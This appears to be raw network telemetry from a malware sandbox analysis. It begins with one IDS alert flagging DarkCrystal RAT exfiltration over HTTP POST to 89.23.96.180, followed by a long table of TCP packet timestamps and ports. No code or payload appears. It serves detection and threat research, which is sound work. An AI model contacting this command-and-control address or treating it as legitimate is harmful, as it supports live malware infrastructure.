2024-12-21T10:47:46.710148+0100 | 2048130 | ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) | 1 | 192.168.2.5 | 49778 | 89.23.96.180 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Dec 21, 2024 10:47:36.715907097 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.716269016 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.716759920 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837260008 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837328911 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837678909 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837739944 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837801933 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837872028 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.838028908 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.957425117 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.190109015 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:37.309979916 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.309992075 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.310139894 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.213110924 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.393127918 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.446055889 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.580589056 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.588006020 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.628973961 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.708499908 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.708722115 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.708815098 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.828463078 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.065128088 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.184789896 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.184803009 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.184813023 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.784557104 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.784648895 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904303074 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.904398918 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904436111 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.904503107 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904587984 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.929490089 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.024250031 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.049058914 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.050647974 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.050755024 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.170450926 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.252794027 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.372423887 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.372636080 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.408865929 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.529093027 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.529103041 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.529112101 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.281209946 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.432554007 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.447612047 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.514288902 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.564980030 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.580627918 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.669713974 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.807955027 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.808023930 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.808324099 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929039955 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.929120064 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929284096 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929454088 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.929514885 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.930057049 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.930109024 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:42.049983025 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.283967018 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:42.404448032 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.404480934 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.404490948 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.308073997 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.471241951 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:43.542351961 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.659013033 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.265361071 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.265623093 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385169983 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.385253906 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385257959 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.385399103 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385437965 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.505048037 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.737086058 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.856947899 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.856988907 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.857172966 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:45.765592098 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:45.893124104 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:45.950975895 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.001621008 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.070662022 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.072890997 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.073050976 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.096230030 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.171283960 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.171642065 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.192684889 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291286945 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291380882 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.291399956 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291482925 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.291668892 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.411472082 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.424586058 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.545228958 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545270920 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545327902 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545357943 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545386076 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545413971 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545464039 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545492887 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545506001 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.545520067 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545555115 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545655966 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.643245935 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.665524960 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665543079 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665558100 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665596008 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.665605068 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665638924 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665723085 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.709913015 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.710148096 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.763070107 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.763161898 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.763194084 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.829957008 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.830816984 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.877943993 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.878022909 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.994146109 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.082005978 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.082581997 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.110837936 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.111021996 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.202265024 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230796099 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230839014 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230914116 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230942965 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230993032 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231020927 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231070042 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231096029 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231144905 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231194019 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231304884 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.232642889 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235481024 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235512972 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235543966 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235572100 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235620022 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235649109 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235675097 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235721111 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.459249020 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.502485991 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.667426109 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.721240997 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.906095028 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.945528984 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.031230927 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.031558990 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.051790953 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.053524971 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151644945 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.151684046 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.151706934 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151765108 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151933908 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.173188925 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.272264957 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.408900976 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.502629042 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.514823914 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.528678894 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.528805017 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.565042973 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.622957945 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.622972965 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.623112917 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.070000887 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.111879110 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.538532972 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.580662966 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.774282932 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.815047026 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890454054 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890463114 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890789032 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010396957 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.010610104 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010611057 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.010682106 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010797024 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.011054993 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.014590979 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.130450964 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.362039089 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.481741905 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.481815100 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.481844902 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.387914896 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.440031052 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.625848055 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.674370050 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.749108076 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.868838072 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.868942022 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.869127989 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.988972902 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:52.221350908 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:52.341181993 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:17.829046965 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:17.877564907 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.067035913 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.111934900 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.186311960 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.186558962 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306061983 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.306185007 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306188107 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.306233883 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306391001 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.425955057 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.658922911 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.778702021 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.778763056 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.778791904 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.684927940 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.736963034 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:19.921819925 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.971301079 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.044270992 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.044447899 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164165020 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.164303064 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164455891 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164483070 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.164547920 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.287086010 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.518322945 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.638214111 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.638310909 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.638339996 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.099261999 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.099596977 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.217730045 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.218970060 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.219065905 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.219162941 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.219574928 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.219644070 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.337516069 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.337616920 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.337713957 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.338691950 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.457902908 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.565200090 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.684926987 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.684988976 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.690118074 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.811640024 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.811682940 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.811749935 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.597081900 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.643245935 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.714060068 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.768187046 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.830002069 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.877599001 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.945913076 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.986928940 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.058260918 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062617064 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062628031 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062917948 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182435989 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.182547092 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182605028 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.182667017 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182693958 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.183192015 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.183255911 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.302256107 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.534007072 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.655004025 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.655036926 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.655066967 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.558446884 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.611953974 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:24.794193983 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.846302986 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:24.943180084 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.063108921 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.063258886 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.063445091 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.182956934 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.409174919 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.529131889 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.529170036 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.529186010 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.442559958 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.486958027 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.678473949 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.721492052 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.796035051 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.796248913 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.915973902 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.916039944 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.916053057 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.916100979 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.916299105 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.035851002 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.268264055 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.388041019 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.388075113 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.388117075 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.831557035 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.831638098 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.951553106 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.951649904 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.951780081 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.954444885 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.954507113 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.957211971 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.957247019 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.071403980 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.076917887 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.077012062 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.077169895 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.196949959 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.299559116 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.419208050 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.419338942 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.424555063 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.544240952 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.544271946 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.544305086 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.331841946 CET804990589.23.96.180192.168.2.5
